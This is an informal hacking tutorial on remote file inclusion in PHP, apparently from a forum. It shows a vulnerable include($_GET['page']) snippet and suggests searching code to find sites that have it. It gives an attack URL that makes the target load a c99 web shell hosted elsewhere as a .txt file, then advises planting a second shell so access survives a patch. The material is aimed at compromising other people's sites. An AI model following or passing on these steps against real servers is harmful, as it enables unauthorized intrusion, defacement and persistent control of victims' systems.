R.F.I. (Basic Tutorial)

Ok so remote file inclusion is including a file from your site on another site/server

normally people will include a c99 shell and there is 1 HERE

so then all you have to do is find a site

so lets say we have a site

http://www.example.com/index.php?page=blog.php

ok so to find if it's vulnerable goto index.php and view the source

newbies "right click-->view page source"

if the inclusion code is something like :

Code:

<?php

  $page = $_GET['page'];

  include($page);

?>

then it's possible to include our file on there site

finding vuln sites is easier than ever now that google code search is out

http://www.google.com/codesearch

so lets say the http://www.example.com/index.php has that code in it

now we try this

http://www.example.com/index.php?page=http:/...om/c99.txt

you see this will show your c99 shell on there site

so when it had the include function for blog.php it was including that page in that site.

a common flaw seeming that people use it so much bcoz of it's simplicity

now this should work

but if it shows shell in it's origional text form

then

but dont try a .php shell on there

coz you see

if you upload the shell to your account on lets say spam.com

and save it as .php

whn you include the shell it will show the shell on your site

so you will just be defacing your t35 account from a different site

so it has to be in .txt form

if it shows the shell i reccomend uploading a shell from the included shell

bcoz it makes it much easier to manage

also you can go back to the shell if they fix the bugs

Happy Hacking